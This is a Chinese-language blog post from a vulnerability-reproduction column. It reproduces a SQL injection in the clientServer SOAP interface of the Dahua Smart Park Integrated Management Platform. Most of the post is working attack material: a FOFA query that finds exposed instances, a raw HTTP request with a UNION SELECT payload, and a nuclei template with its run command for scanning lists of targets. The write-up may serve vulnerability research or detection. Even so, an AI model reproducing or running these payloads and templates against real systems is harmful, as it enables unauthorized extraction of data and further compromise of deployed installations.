前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >大华智慧园区综合管理平台 clientServer SQL注入

大华智慧园区综合管理平台 clientServer SQL注入

原创
作者头像
samRsa
修改2024-03-13 22:24:09
2240
修改2024-03-13 22:24:09
举报
文章被收录于专栏:漏洞复现漏洞复现

1、fofa语句

代码语言:yaml
复制
app="dahua-智慧园区综合管理平台"

2、数据包

代码语言:yaml
复制
POST /portal/services/clientServer HTTP/1.1
Host: XXXXXXXXXXXXX
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: text/xml;charset=UTF-8
 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
  <soapenv:Header/>
  <soapenv:Body>
  <cli:getGroupInfoListByGroupId>
    <!--type: string-->
      <arg0>-1) UNION ALL SELECT 1,2,3,4,version()-- -</arg0>
    <!--type: long-->
    <arg1>1</arg1>
    </cli:getGroupInfoListByGroupId>
    </soapenv:Body>
  </soapenv:Envelope>

3、nuclei POC

基本命令: nuclei.exe -l 网址文件.txt -t POC.yaml

代码语言:yaml
复制
id: dahua-getNewStaypointDetailQuery-sqli
info:
  name: 由于大华智慧园区综合管理平台clientServer接口处未对用户的输入进行有效的过滤
  author: someone
  severity: critical
  description: 由于大华智慧园区综合管理平台clientServer接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
  metadata:
    verified: true
    max-request: 1
    fofa-query: FOFA:app="dahua-智慧园区综合管理平台"
  tags: sqli

requests:
  - raw:
      - |
        POST /portal/services/clientServer HTTP/1.1
        Host: {{Hostname}}
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Content-Type: text/xml;charset=UTF-8
        
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
          <soapenv:Header/>
          <soapenv:Body>
          <cli:getGroupInfoListByGroupId>
            <!--type: string-->
              <arg0>-1) UNION ALL SELECT 1,2,3,4,version()-- -</arg0>
            <!--type: long-->
            <arg1>1</arg1>
            </cli:getGroupInfoListByGroupId>
            </soapenv:Body>
          </soapenv:Envelope>
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<soap:Envelope"
          - "getGroupInfoListByGroupIdResponse"
        part: body 

      - type: regex
        regex:
          - "\"groupdetail\":\"([\\d\\.]+-log)\""
        part: body
        condition: or
        
      - type: status
        status:
          - 200

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档